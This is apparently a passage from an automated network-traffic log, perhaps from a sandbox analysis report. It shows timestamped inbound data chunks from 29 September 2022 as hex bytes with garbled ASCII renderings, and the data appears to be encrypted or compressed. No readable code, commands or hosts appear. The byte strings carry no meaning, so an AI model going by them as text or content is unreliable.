                                                                                                        2022-09-29 12:45:44 UTC5525INData Raw: 69 fc 69 e3 4d 6d 29 7a 20 63 79 76 80 d9 c3 c9 45 d0 bb 31 b0 7b 55 ac d7 ad 97 64 70 c3 ce 5f f3 8f ac 17 26 c0 71 ab 74 03 88 45 ed 3c 9b 17 00 1c 96 60 7f 34 d6 bc 9c b5 ea 39 f6 86 ff cd 90 b3 af 92 45 fe 53 05 b1 b8 98 65 a3 4a ae 73 4d 99 2d bb 03 57 51 34 88 28 1b 1e bf 1e 67 43 d8 9d cb 73 b9 9b d3 e8 25 89 17 01 11 34 c6 48 d6 99 e4 1e 75 a2 7d 27 ac c0 da bb b8 5c 4c 5f 45 68 44 c0 69 03 d5 8d b3 5b 83 de 84 ff f2 a4 4e 6d 52 2b 04 cd ef bb cd ff 99 74 d7 01 2f 43 ab 6a e5 32 d3 96 51 94 c6 8c 9d 17 f9 c6 29 e3 72 2a 0c ea c2 03 43 73 0b e3 38 39 7a be 29 a2 3e f7 0d 7a ca 88 df b6 37 aa eb 6b c8 91 ef e6 4e 59 ff 0c 3b c8 2d 40 8b a8 c9 d8 e4 cd 59 1b 36 61 56 83 79 23 34 c3 e2 3d 7b 7b c0 ac f2 b5 7f 57 f9 94 68 f3 46 b8 e5 f5 0d bc 93 ba 91
                                                                                                        Data Ascii: iiMm)z cyvE1{Udp_&qtE<`49ESeJsM-WQ4(gCs%4Hu}'\L_EhDi[NmR+t/Cj2Q)r*Cs89z)>z7kNY;-@Y6aVy#4={{WhF
                                                                                                        2022-09-29 12:45:44 UTC5541INData Raw: 9c 0f 20 dc 78 a2 b3 94 d3 7b 11 3d df 27 81 9b 00 89 c9 c0 54 50 09 dd 07 38 f1 a5 ac ed 53 17 50 ef 99 17 23 34 df e2 ba b0 80 a3 a7 cd d9 7c bf ef 22 f4 ce 7f 5b a6 84 56 c1 18 b0 dc 67 51 ec a7 7d cf 4b 60 26 d3 75 41 5b a0 2d f5 8b f3 b2 41 eb 2d ea bc 2d ce f0 26 b8 12 a1 77 24 37 96 66 c2 2a b2 d1 4e 10 f2 3f c3 66 9b af fb 3d 46 e9 71 e6 67 47 26 a6 a7 76 08 ba a2 14 1f 7a 2c c0 3e 2d 4d a7 01 11 6d bd b9 6c 9d 9a 4d 51 87 c5 7d de 3f 8f 36 35 09 03 de 14 15 a4 7a 5c a2 45 e2 c3 e9 ed c1 84 fe 54 0e fd dd 98 d9 29 31 6c 67 4f 75 94 6f 6d 5c b0 db 4d d6 39 04 a5 5b 15 fb a4 fd e4 e6 b0 95 6a ab b0 ab 4c c1 8b d4 62 a9 73 08 58 c9 bf cd 01 2b a6 3c c0 52 5c e0 c9 9b 5c f9 d6 82 ed 50 c2 30 4b 6e bb a8 cb 13 59 dd ab 44 03 d5 ad f4 b0 f9 3c eb 64 1b
                                                                                                        Data Ascii: x{='TP8SP#4|"[VgQ}K`&uA[-A--&w$7f*N?f=FqgG&vz,>-MmlMQ}?65z\ET)1lgOuom\M9[jLbsX+<R\\P0KnYD<d
                                                                                                        2022-09-29 12:45:44 UTC5551INData Raw: 36 55 c5 26 72 78 aa 70 7f a7 3b 22 1d 9d a9 49 2b 80 44 3c 8b ae db 30 a9 27 9c e7 56 cf 70 f3 9b 5d d8 bc 56 7c aa d2 61 23 9e 4d b6 66 81 cb 56 cb d9 21 48 82 98 b6 d5 b9 ec f0 bf f3 54 51 d4 e6 99 5f ec 42 68 a4 14 26 6c d5 d7 ca 04 d1 da 21 a8 77 ca 42 65 56 84 df e8 fb a1 35 e7 7b 47 7b 8d 2b e6 de 9f 46 aa 15 7c 87 39 e7 86 e7 81 79 1c e6 9f 79 83 17 fe fc 53 28 16 64 74 00 a0 05 71 fe ee 16 49 b3 cf 18 07 c0 dc 5b 6f b4 41 fd 1a 2c 7f 66 b8 0d b7 ce ba d9 40 45 3e fc e5 7a 62 37 5c 56 19 46 de 4c 3f 2e 7c 85 4a 03 9f 36 d8 bd a8 9e 3f d3 01 13 bf 66 d9 cb ae 54 9c 26 f2 cb 49 b3 48 8e 99 c4 fc 9c 17 ef 30 c0 c5 14 8c a4 61 66 9b c1 58 d6 29 1f d2 76 d3 d1 81 68 69 87 e0 61 21 7a f6 ec 60 1a 28 e3 f1 14 f4 55 a2 41 5a a3 a0 7c f5 57 9e 26 ce 00 7e
                                                                                                        Data Ascii: 6U&rxp;"I+D<0'Vp]V|a#MfV!HTQ_Bh&l!wBeV5{G{+F|9yyS(dtqI[oA,f@E>zb7\VFL?.|J6?fT&IH0afX)vhia!z`(UAZ|W&~
                                                                                                        2022-09-29 12:45:44 UTC5567INData Raw: a1 7a 58 3b eb 9d a4 3c 51 15 a6 76 16 9f 4a 7d fb cd c9 30 6a c5 86 e2 09 4f cc d1 fb f5 a2 c6 0d 46 08 e1 45 b4 76 b6 69 01 3a 16 e5 e1 6e a3 0e 72 54 d9 27 c4 ab 55 fb 23 51 e3 a9 b2 d2 d7 c4 e8 a9 3f d9 c1 23 0c 30 77 d7 6e 05 b6 59 08 25 be 39 6e 56 cf 78 29 25 64 81 1a 85 f6 ee d2 9c 94 c2 0f bf 70 f7 d7 31 c5 7f 39 46 b3 60 1b 37 33 a0 d7 98 54 5d de bb 87 b9 0c ec 69 8c 2b e5 8e bb dd 2c a0 9c 80 61 38 ed c1 45 2e be 34 ac 1b c1 4b 63 b3 8b d7 56 a4 b4 60 7f c8 b4 ac 48 6c 32 73 0b d2 2e 86 e2 d2 29 99 68 30 95 b4 32 98 41 6d e5 76 cc c1 18 38 63 b9 4b 8a a9 c0 90 2f 44 6c ce 88 12 e7 64 18 e5 00 08 bd cf d3 fa 34 38 fb a3 8f cb b0 60 df fb 30 37 23 a7 2c 89 eb 8e db f0 d5 5a b3 0f 6f c1 5e 00 34 0d 41 9a 40 d6 b2 fb b8 82 fb b8 f6 04 cb a7 c1 86
                                                                                                        Data Ascii: zX;<QvJ}0jOFEvi:nrT'U#Q?#0wnY%9nVx)%dp19F`73T]i+,a8E.4KcV`Hl2s.)h02Amv8cK/Dld48`07#,Zo^4A@
                                                                                                        2022-09-29 12:45:44 UTC5583INData Raw: 76 d6 44 f8 82 72 c4 46 6a e0 50 7c 87 48 c1 46 13 12 18 db f0 54 5d 44 28 6c 0a c9 6b 8e 98 31 7a 88 4f 87 b6 b0 a1 d6 fe 96 1c b6 6a 0c c7 31 d4 f2 4a 52 2c 3e 96 43 a8 b6 c6 a6 65 d1 a2 5f 35 1d 60 c4 d9 21 2d 71 8f 7b 5f 21 5e d5 68 f7 51 08 47 3b 65 6a 35 3c d7 e5 cd fb ac 1a 43 a2 ba 4e 54 fb f2 f1 e1 2d 14 34 f6 c3 07 88 61 3b ed b4 e5 69 16 b6 97 92 22 6d c9 e3 47 6f 60 ff e6 02 e4 f2 eb 31 ab 34 86 6e 20 06 57 62 64 4e 4c e7 aa 17 6c 42 2d 8c 89 53 d2 2c 1e 0b 00 2f 92 e9 01 01 65 8a 1b ca df 7f 3d bf 7b 65 c7 7b af 1c 02 7b 76 62 42 4e b7 38 62 a9 2e a5 21 f2 98 24 40 1f 44 55 3b 63 a1 38 f1 8e c0 c5 53 a1 ed d3 a5 59 22 aa 96 09 ce 8f 9a 57 f9 70 42 3c 03 c7 c7 4e b5 65 a6 b8 d4 87 e2 64 46 f6 46 fa a9 e4 7c be 46 39 c3 83 c4 41 9f 23 38 9b 04
                                                                                                        Data Ascii: vDrFjP|HFT]D(lk1zOj1JR,>Ce_5`!-q{_!^hQG;ej5<CNT-4a;i"mGo`14n WbdNLlB-S,/e={e{{vbBN8b.!$@DU;c8SY"WpB<NedFF|F9A#8
                                                                                                        2022-09-29 12:45:44 UTC5599INData Raw: b3 37 26 6c c1 97 2b fd 8a 2e f6 3e ba 11 08 8b c7 8c 76 a3 1a 00 f3 79 fd 67 90 5a 19 9d ba ac 4f cb b7 3b 57 f1 43 08 6a cf 21 fe 2e 55 5b a0 45 47 3c 28 79 65 90 97 01 74 76 69 fb ba da 8c 1d 33 14 6d dc d3 4e 90 bc c6 d7 51 43 ca be 14 a6 a7 ec eb 3d df d3 95 8c aa 80 85 9b c9 18 45 cd 51 4c 6f 5a cb 49 42 fe 19 b3 e2 3e 45 5b 0a 6f 46 ac c0 64 da 66 15 42 fd 56 d2 89 d2 51 84 6f 2a cb a5 eb b7 c5 0d 11 32 1f 18 1a d7 d7 27 a0 13 12 8f 25 c6 61 7d c5 1f 90 df 37 34 78 1e c9 e4 7c 39 87 0c 07 14 2c f6 15 85 2a 65 19 a6 85 e0 63 e4 fa 89 96 a5 29 a0 92 9c 20 b1 09 a5 31 6a 41 21 80 c9 e2 2e a1 18 35 eb 0e 21 6b 9e aa 11 ef 7e 0e c6 97 26 00 a2 05 d3 cf 50 99 1f 25 da 18 9d 58 1e ef f4 82 23 fd 59 9c 94 7c 2d 47 7e f8 6d ba 2a 48 83 5d 22 bf 4a a8 81 ed
                                                                                                        Data Ascii: 7&l+.>vygZO;WCj!.U[EG<(yetvi3mNQC=EQLoZIB>E[oFdfBVQo*2'%a}74x|9,*ec) 1jA!.5!k~&P%X#Y|-G~m*H]"J
                                                                                                        2022-09-29 12:45:44 UTC5615INData Raw: 7e 02 f2 99 d3 4a 0d fc 7d c4 3f 7c c0 b3 41 c5 bd 32 72 64 6d 33 c0 68 57 8c 7e d8 56 bc cc a9 fe b1 5d b9 bd 0b 1d 77 58 0c 6b 22 6e 83 31 a8 9c 30 b5 78 5d 1d a7 6c cd 59 91 27 9c d4 8c 15 82 da 03 86 63 cc 47 1e 37 22 5c b9 ef c4 59 ae 46 2b a4 74 d4 85 0d b1 a4 c0 68 36 9c 80 20 4e 13 5b ca ed 6b 96 e6 47 1b 32 dd 23 7c 5c a2 d1 f0 9e e4 67 d3 69 b4 97 60 e3 63 29 a7 26 d7 c4 33 22 da 86 19 6f 24 60 b1 a5 e5 15 a8 34 40 38 b4 78 c8 6f 61 83 a9 ef 25 f0 f7 a9 65 5b 14 ca 16 33 38 83 eb 87 a5 21 ab a7 c3 51 53 45 49 80 a7 10 ea 9c 0c 6c 3a 51 8a 41 2f 21 d4 48 f8 cd b3 85 d8 f8 13 61 94 83 39 c2 f1 e6 35 13 cc 49 8f 3e 2b 36 ad 51 8d 2a de b7 3a b5 33 e2 36 0b bc ae 3e 84 dc c3 92 68 39 d3 fe 23 11 d7 e0 30 09 d0 83 2f cb 68 75 50 0c 14 e3 07 22 cd 75
                                                                                                        Data Ascii: ~J}?|A2rdm3hW~V]wXk"n10x]lY'cG7"\YF+th6 N[kG2#|\gi`c)&3"o$`4@8xoa%e[38!QSEIl:QA/!Ha95I>+6Q*:36>h9#0/huP"u
                                                                                                        2022-09-29 12:45:44 UTC5631INData Raw: 6c 8c 79 73 ac 76 1d 98 c7 33 e3 cd 14 7b 23 ca f6 ac f4 2b 91 7f 97 56 19 24 90 16 25 37 f1 c0 ff 97 bc 71 9c 30 31 b4 84 c0 43 6c 79 4c 5e b3 67 ef 07 5b a5 b0 2b 56 ec b8 60 96 4e 99 26 23 e1 47 c2 c4 69 29 cb 8c bf a2 29 2a f0 94 9b 5c 0f fa 6a e2 c1 08 10 be be 1c 06 f4 1c dc ee e4 0a ee 22 04 f0 82 9e ef ff d0 93 f3 25 8c 38 8d 69 04 4f 87 3a 4d 40 de 36 d2 1b 31 26 1e 48 25 d6 23 4b 47 18 ea 13 28 fa 51 6d 2c f8 ea 76 20 39 ed f9 54 29 5c 76 d8 7f 12 ff 51 44 a0 09 03 50 60 fc 4f 4a 92 66 9a 7d 11 11 39 d3 3f a4 79 be d1 d1 c8 b9 d8 0f 00 11 bd 74 34 7e d0 1d b0 7b a7 94 4d b0 f2 3b d9 30 36 20 eb de 31 88 64 3f fc 54 3f f0 1b 22 0b 3c 26 0d 9d 59 07 13 33 f8 87 8a a4 7e 97 cb db e9 a8 03 49 ed 41 bb f0 d0 3f 6e d4 1e 3e cd 02 cb 07 b3 4e cd 65 51
                                                                                                        Data Ascii: lysv3{#+V$%7q01ClyL^g[+V`N&#Gi))*\j"%8iO:M@61&H%#KG(Qm,v 9T)\vQDP`OJf}9?yt4~{M;06 1d?T?"<&Y3~IA?n>NeQ
                                                                                                        2022-09-29 12:45:44 UTC5647INData Raw: fb ac dc c3 b4 93 da 68 ac cb 17 54 46 51 7a 32 9c ac 92 5d c6 74 56 66 a9 d7 70 55 b9 8b 56 d7 fe 31 96 ed eb d9 27 39 ca 5a c8 86 4f 1e f4 2b 80 36 52 1f 9e d4 4a 1d 44 d0 12 f8 78 7a 7c 4f 62 a0 f0 af 58 14 a3 2c 89 f8 71 e1 8f fa 36 69 6f 6a ab d8 77 2a 2a e8 da 3f de 97 7f 37 be 70 38 7f b6 d6 e1 bd 90 8d 6e 5f 26 c4 95 83 06 53 7e f8 8b 67 ca 00 16 d1 2b a3 bd e8 df b7 59 9c 3f 0c f5 da 06 13 e0 bc da 28 36 66 0d 4c c9 a8 7a 9c d0 d2 bf b0 50 48 20 59 d2 a0 b0 31 1e 6b 6c 4e 28 ac 0a de cc aa 3a 8e 29 e7 e4 0c 32 6f e2 c3 df 75 08 fb 02 ba dc 87 7f f2 ec 41 30 ac 1c 90 d1 df 74 99 9c 6f 8e cc f1 63 6a be 1d 5c cf ce 42 b1 fc 87 86 f7 63 b0 8e a6 ce 8b d8 3d 0d ca db b7 4c 14 9c 47 7e ed d2 84 c5 a2 1e 0d 3d 91 d8 49 fd d7 1f 0e 61 14 8c 39 71 84 72
                                                                                                        Data Ascii: hTFQz2]tVfpUV1'9ZO+6RJDxz|ObX,q6iojw**?7p8n_&S~g+Y?(6fLzPH Y1klN(:)2ouA0tocj\Bc=LG~=Ia9qr
                                                                                                        2022-09-29 12:45:44 UTC5663INData Raw: a1 61 73 61 9b 75 59 e4 ae b4 68 e0 f7 4c f0 8a d3 8b d2 9d af 0e 17 88 4b bf d4 19 b8 9b 46 ed 3e 94 5e b2 17 44 a2 94 43 5f a0 80 e8 85 a7 41 aa 18 a8 a9 1c 71 23 3b e8 e1 df c8 8f 0d 4c 0c cc 69 8a 04 73 d4 c8 83 c1 88 f1 38 f4 f3 eb 9e b9 3a 25 ee 41 71 77 95 eb 38 8f d2 59 18 bc a3 a5 ae 3e 8a 98 73 1e 02 f7 33 28 69 9a 2f af 66 44 d4 75 d7 63 66 ec 08 a8 91 50 6a 13 73 67 7b 7a d2 d5 87 b6 7c 9b de 24 26 df 02 43 b7 b9 9d 74 c8 0f b3 92 df aa 80 69 f0 75 03 ab 4b 66 d5 e9 1e c9 98 f7 63 3e 54 ca 51 2e e5 53 04 6e 88 11 45 76 d2 06 f6 62 b9 b7 c6 30 05 5b 2a 2c d4 33 72 dd 39 8a 08 9e 2f 56 57 f5 9b 46 e4 39 50 76 70 92 37 ec b0 2a 43 df 1b 50 af 83 8d 24 8a cb ac 85 2b 4c 4c 5b 51 87 61 1d 26 c8 c2 a4 c2 b0 12 a6 20 b4 16 e6 11 4a 69 5c 5c 89 fd 73
                                                                                                        Data Ascii: asauYhLKF>^DC_Aq#;Lis8:%Aqw8Y>s3(i/fDucfPjsg{z|$&CtiuKfc>TQ.SnEvb0[*,3r9/VWF9Pvp7*CP$+LL[Qa& Ji\\s
                                                                                                        2022-09-29 12:45:44 UTC5679INData Raw: 86 47 95 b9 66 57 0f 11 69 9d cf 0a 5a 76 7f 15 9a 7c 3d 07 d6 47 43 c0 ab fe dc 10 61 46 73 60 85 7c 28 df a7 86 25 f8 2d 05 f1 8d 1d 96 29 93 4a 50 46 6e c9 b4 32 32 f8 92 fd 2f 0c 5e 24 b2 ab 29 55 f1 4f 83 ce 85 47 28 cb 04 2e 0e cc 1c 6d 10 93 bf 4d 27 05 8c 1e aa c9 8e 15 da 6a 0b e1 3d 8f 00 b7 fc cd 22 7a 72 d0 03 68 f8 07 2d 17 c8 dd 17 a6 c4 7b 35 a6 3e ab 81 01 9f 2f c0 4f cf 0e 15 01 50 3a ee 62 4c 5d 43 a6 03 92 65 53 7b 96 71 a7 96 17 fa b7 23 db 35 80 29 71 1c 2f b3 ae fa e0 fe 92 d1 05 8c 73 31 19 b8 2f ca 28 a4 dd b3 1e af a7 b1 0c 0c e7 ee b5 40 f7 27 01 6b a6 d7 f5 0e 59 c4 1f 28 5b 8a ba 1d 99 df c3 fc 17 a2 8c 71 00 24 64 0b b7 a0 f2 68 91 93 20 93 58 b3 13 20 9c 04 de e4 1c 5a ef 96 2b 7b e8 96 06 b2 bd 00 90 3d 63 68 60 3a 71 d5 f6
                                                                                                        Data Ascii: GfWiZv|=GCaFs`|(%-)JPFn22/^$)UOG(.mM'j="zrh-{5>/OP:bL]CeS{q#5)q/s1/(@'kY([q$dh X Z+{=ch`:q
                                                                                                        2022-09-29 12:45:44 UTC5695INData Raw: f8 82 fc 50 6f fe 28 3f fc ed d5 4d ab 42 bf 76 9a d8 18 ef 45 0d b1 ae af b6 f4 79 00 99 0c 8a 5b f3 a4 de d2 ea a9 4f 20 db f1 33 bf e5 e7 04 29 ac d6 76 13 45 05 51 17 b5 80 79 3f c9 b7 7b c6 5f 55 bd b2 bb f7 d3 a5 f2 70 1c a3 dd 24 70 0b 02 43 e0 fc 8f d8 5e 2d 7b 01 64 4f 6a c2 ee 67 d1 0f ee 7a 24 25 0f e6 bf fd fa 0f 37 5b 45 e9 f4 4c 2f 1e 6a 17 05 2d 98 48 fb 96 67 43 de bb 6a 5b ef 66 93 1b e5 25 f9 ca 19 78 43 44 21 03 c4 42 0f 4b 51 5b 2d e9 05 28 ad 2a 98 3a 32 b7 e9 12 29 0f 4f bf 6d 0b 64 72 e3 de b0 ea 3a 80 d8 75 98 b9 85 7e 16 49 c2 bc fe c7 1d 70 88 13 57 30 2f 6c 96 ce 91 7d de aa 79 ce 64 ef e4 80 e9 e9 7a 5a 4c 62 b5 af be fc 84 c6 7d da 2a 46 d6 e1 a9 ca 79 00 23 cf 39 55 1e 7a cb 71 94 47 32 ec 41 69 9c eb 74 d0 98 fa 98 0c 61 f3
                                                                                                        Data Ascii: Po(?MBvEy[O 3)vEQy?{_Up$pC^-{dOjgz$%7[EL/j-HgCj[f%xCD!BKQ[-(*:2)Omdr:u~IpW0/l}ydzZLb}*Fy#9UzqG2Aita
                                                                                                        2022-09-29 12:45:44 UTC5711INData Raw: 7f 0d 2c 76 1a 51 f1 f7 69 8d ff 47 b4 8a 08 d9 8a bc 05 e8 02 15 d4 3c be 98 ce ad 0e d6 89 a5 8b 3f fd ed 08 1b 8a 04 71 d2 1e 21 9c 84 8a e8 b2 43 9f 7f 02 b2 2c 42 ae 4f ec 5e 14 33 b4 16 39 d7 4a cd c5 0e 9a 85 b2 5f 55 ea e3 c6 80 fe a4 c4 d3 e9 51 65 7b a8 d0 44 25 dd b4 d2 00 fb b1 db 96 00 5e b9 b3 40 43 16 9d 4a 02 a0 c9 61 e0 7e e9 97 6d 45 86 8f 15 cf bd b1 37 3b 7a 63 3a a4 d6 58 d8 f1 0c 7f d7 c2 1a 9c b6 c6 5c 8e 81 9a 8d 49 9f 5a b7 b2 13 23 cf 70 0a 4a 94 1f 2c 8a 13 73 9c 95 27 40 a8 76 4b 34 a8 a1 b7 16 b0 4d 25 6e 1b 5e 3a 03 67 f0 75 a8 6b 7b 07 a9 a7 be dd 56 bb 34 ec 90 cb 11 3f c8 ee ec b9 5c 85 20 5f c2 ab 10 a0 82 86 67 fb 3c 5d 8c 64 e9 e9 7d bc fe be fe d2 f6 f3 cd 53 6f 3f 9f 01 37 72 b5 68 b0 8c 60 9d 3a 11 ab e6 bc e7 c7 ac
                                                                                                        Data Ascii: ,vQiG<?q!C,BO^39J_UQe{D%^@CJa~mE7;zc:X\IZ#pJ,s'@vK4M%n^:guk{V4?\ _g<]d}So?7rh`:
                                                                                                        2022-09-29 12:45:44 UTC5727INData Raw: 9b 44 0c db 6a ae 24 8f 20 04 67 6b 92 a2 1a 25 a7 a8 d2 0e ea 58 25 9a 11 12 9a 31 34 5d b0 5d 5c 36 45 7d 43 9f 14 57 6b 1c fc 76 6d ed 29 ab c8 b0 f6 1d 46 70 9b 2c fc 0d ab c4 c7 ac 7e 9f 39 94 d3 e6 53 7a 5f 38 7a 04 0c 25 76 fe 5c b8 ab 8c 09 2d 3a 4a 48 ab f9 2a e8 08 87 e2 3e 42 ad 05 a7 2e 39 72 e3 b8 1d 90 df 1d 92 8d 15 e6 fc b7 ef ce a1 28 a5 7a a7 44 98 47 83 5f a5 0e 54 dc 7d aa 20 a1 3f b6 5e 91 8e a6 92 11 73 61 71 36 e5 c1 c2 f5 87 43 a9 68 34 0a c4 fb d2 33 50 83 bd fd 8b 8b ba 11 2f 1f 2e 6b c5 2e e5 b4 04 56 72 0c 36 5e 70 83 3a 0b bc 3d 83 af a3 b0 6d 77 42 ea b3 17 1c fc d7 ff 24 ba f0 07 04 98 4f 3c b3 08 3d 79 c6 f2 64 1e 99 f8 ac 59 ab b1 a5 c5 13 cf 98 90 12 c6 f3 8a 7b 2e 64 5b 69 7e 2a 33 29 cd 67 29 21 e2 ef 95 1c ce 4b 3f 43
                                                                                                        Data Ascii: Dj$ gk%X%14]]\6E}CWkvm)Fp,~9Sz_8z%v\-:JH*>B.9r(zDG_T} ?^saq6Ch43P/.k.Vr6^p:=mwB$O<=ydY{.d[i~*3)g)!K?C
                                                                                                        2022-09-29 12:45:44 UTC5743INData Raw: af 6e a3 3d df 08 71 04 f4 61 e1 bc 67 c1 37 22 d5 ef 54 ea 4f 3c 3e c0 56 34 e1 91 2f b1 cb e8 ce 3e 2a 88 c6 60 4d a8 19 cb 21 8e 23 70 20 5b 79 a4 81 b8 55 f9 c4 a0 fe 82 f5 06 a6 a5 f0 f3 1b ea 3e 5e 24 b6 4d 7f 38 e3 da 22 1e 68 93 5a ed f0 cb 2d 9d 46 56 42 6c 9e 04 b4 ff 03 e0 c1 cc eb 03 ad 18 fd eb 27 a9 fc 54 27 6c b3 86 7e 61 1f c6 d9 10 ff 55 fd 78 f7 12 7b d1 41 c7 d9 4c c7 41 83 92 29 76 18 ad e6 6b 30 fb fc f8 c0 22 42 df 1f 01 a9 58 fb 3d c2 94 01 96 f8 46 4e 5e 10 b7 ba 39 08 c1 79 90 64 bc 20 e4 fb d7 ea 99 86 35 ff 79 2b bd d2 79 02 0a 8a 6f 8d f4 a2 4c 15 16 4f 9a a9 b4 43 ee d6 5a 1b 04 eb f8 b2 db 59 06 36 c6 e5 07 b1 b1 a3 81 32 a3 39 6e f8 9c 3e b8 80 64 df 40 b4 3e 69 0d 7d cf 6e a4 1c cc e6 35 4d 6d 9a 6d 12 c7 44 6c f0 7c fa e2
                                                                                                        Data Ascii: n=qag7"TO<>V4/>*`M!#p [yU>^$M8"hZ-FVBl'T'l~aUx{ALA)vk0"BX=FN^9yd 5y+yoLOCZY629n>d@>i}n5MmmDl|
                                                                                                        2022-09-29 12:45:44 UTC5759INData Raw: 6c 68 cd c8 70 62 b7 f7 b5 51 aa 8d ca 4f 9e 0d 66 0b be 1f 03 90 b7 f1 62 a4 dd 96 24 70 7a 60 81 b2 d5 9e cb 1c 5c 35 67 f7 c4 21 c1 ff 33 23 6f ad 90 61 9f 96 80 c6 7f 9a 5c ce 2c 82 fe fb 9f 92 b6 89 9d c4 ec f5 9a 3f ce 28 c6 ab a0 be 05 39 b1 4c e6 b1 16 85 1c 55 92 e7 05 c3 3d 3e ce b9 3d 2f 58 b6 77 b4 7a 8c 76 81 3c 04 2d 23 e4 2e f4 52 78 9f 31 57 15 51 41 36 32 28 03 a7 9a f0 75 10 b2 96 50 b4 b2 c9 6e c3 3f 1f d0 99 6a f8 bd 69 a5 4f a5 c2 04 d2 ac 18 8f af 02 a7 f4 5b 4d ea 08 80 75 2b 14 fd 0a 87 b5 e2 0a 45 58 2b 47 7c fb f1 5d 68 47 32 bd a5 9e 87 c1 96 e0 80 00 90 18 2e 81 13 cf 51 0f 05 da 31 95 df da 46 0f 8c 02 a5 ef 4c 88 0c 0e 5c 6f 01 6e 50 6c f0 dd e2 06 23 33 c3 de e7 fb 7c de e6 bb ea 3b 39 12 a1 73 07 8d b8 50 1a 3a 5b c8 58 2f
                                                                                                        Data Ascii: lhpbQOfb$pz`\5g!3#oa\,?(9LU=>=/Xwzv<-#.Rx1WQA62(uPn?jiO[Mu+EX+G|]hG2.Q1FL\onPl#3|;9sP:[X/
                                                                                                        2022-09-29 12:45:44 UTC5775INData Raw: 31 91 b4 4e 2f f8 86 bb fd d0 7d e5 43 ad 93 ab ab c1 d2 1a d4 e5 8e 08 82 a4 92 92 ad f3 99 02 6b 14 6d e8 a3 0b 9c 27 dc 4e 75 35 58 d2 64 dc a6 12 bc 54 86 13 a3 e0 e4 38 78 09 4f 55 b5 33 3d 5f d7 80 30 aa 98 7d 56 9f 4d f3 01 a7 46 46 c1 87 1a a2 b9 04 79 75 48 fe 3c 2e 52 7b 55 5b d9 c4 7d 15 ed b4 ea 77 c2 4e 9c fb fa 94 fe bf b2 14 3a 73 65 60 dd 81 c6 51 bf 45 33 da 16 d5 7a b3 e7 ce 21 82 28 7b 10 54 c0 3e 45 3f 3e e6 42 2f b2 08 d7 ac e4 4f 9d 09 27 df ad a3 d6 3a e3 77 41 07 4b 7c 30 02 75 56 a1 53 98 ac 96 32 ae ca e9 f5 a4 85 f6 65 84 cb e3 1a 3d c0 7d ec 59 5e b3 26 1c b5 dd a3 38 48 de ec 6c aa 1f 60 16 44 b2 68 a7 df 44 42 19 e1 96 1c db cf f2 2e 35 f5 7f 7c cc 52 1c bb 0a 30 ca 01 db a6 6e 2e e5 99 f5 f1 03 40 70 54 93 71 53 06 c6 02 b4
                                                                                                        Data Ascii: 1N/}Ckm'Nu5XdT8xOU3=_0}VMFFyuH<.R{U[}wN:se`QE3z!({T>E?>B/O':wAK|0uVS2e=}Y^&8Hl`DhDB.5|R0n.@pTqS
                                                                                                        2022-09-29 12:45:44 UTC5791INData Raw: ec d1 87 c6 fc ed 57 ae 19 8d 90 e7 69 3a 1b 68 29 c2 e3 18 e3 e5 90 ce c1 53 bf 6a 06 4c c0 09 8b c7 d2 1b 21 a1 5d 61 0c c2 92 85 14 a7 e0 a5 ea c4 bb 62 52 f7 b5 f3 96 c1 9a 63 51 39 be 04 e7 d9 86 ed b6 de 3d f1 d0 29 1b 75 11 aa b5 2e 83 ed da ef 18 81 eb e7 9e fe 8e 9d 42 67 6a fa 62 7b f1 e6 80 27 b6 4d e7 37 2e f4 cf 61 24 ee 07 ca 65 6f 20 16 2d 1e c9 ce 73 d7 2e b1 47 63 d1 3a e0 52 4f d0 47 d3 d7 02 c3 23 ef e1 a4 53 af 9c 44 98 e8 c9 c2 f9 0a 14 a9 fc d7 29 da 31 af a9 ff 25 49 cf a4 f7 d0 0a 95 71 f1 b9 d3 0c 35 74 8f 9c 03 3a a1 18 80 2c 11 42 44 fd 73 f2 b4 1c 84 33 c2 f1 0e 80 2e 3f 6c 39 28 b1 f3 f0 47 47 b9 16 81 55 ba c2 04 4d fb e0 0a 62 69 f7 a7 59 5a 2f dd 54 2c 1f 09 52 c9 8e 15 f1 2f 2c ad f1 ae f1 4b c4 45 59 ed cc bc bb cb af 87
                                                                                                        Data Ascii: Wi:h)SjL!]abRcQ9=)u.Bgjb{'M7.a$eo -s.Gc:ROG#SD)1%Iq5t:,BDs3.?l9(GGUMbiYZ/T,R/,KEY
                                                                                                        2022-09-29 12:45:44 UTC5800INData Raw: a5 24 8d 35 1d 89 d1 24 53 6e 49 cb 56 2a a6 1a 59 d5 7c 76 0e 0a 9f 95 e9 9e cc 68 78 3f 3d 6d 8f 56 33 d5 87 ae e0 e4 0f f2 c3 1c 08 59 40 a7 6b 25 d5 3e ab 75 55 80 33 e6 79 8d 0a a2 b0 55 f7 98 c7 1d e2 71 40 07 5f 5c ad 24 37 f8 a1 9c 2c 57 f0 fe 8d 88 c6 a5 60 25 b7 2f 03 9b 99 e9 39 77 74 8f a4 41 d8 36 f8 92 0e 8c 80 bd 09 f6 a7 d5 56 43 c5 ff 47 13 76 e2 82 c5 f3 68 e1 07 b5 8e 2f 4e e0 4c f8 23 32 75 f6 8d 07 cf 98 6e 2f a1 57 3f f1 05 db ca f3 8f 79 d9 c3 a5 44 20 bc b3 44 17 f0 2b 56 a6 51 98 66 c7 1b eb 40 9d 6a 62 0a e9 d6 10 2a 01 e5 cc 90 6c 1c 47 41 20 c3 07 c4 ed 3b 4a e5 4b 8c 8f 8d 81 85 2e f1 d9 4f cb 1b dc 59 7c 8e 30 99 3e 98 d3 36 a7 a4 fc 69 40 36 f5 9a 7b e2 b8 3d 9e d9 32 db 9f 22 54 0c 19 94 ee 25 da 6e 6c f0 43 f9 10 94 ac dc
                                                                                                        Data Ascii: $5$SnIV*Y|vhx?=mV3Y@k%>uU3yUq@_\$7,W`%/9wtA6VCGvh/NL#2un/W?yD D+VQf@jb*lGA ;JK.OY|0>6i@6{=2"T%nlC
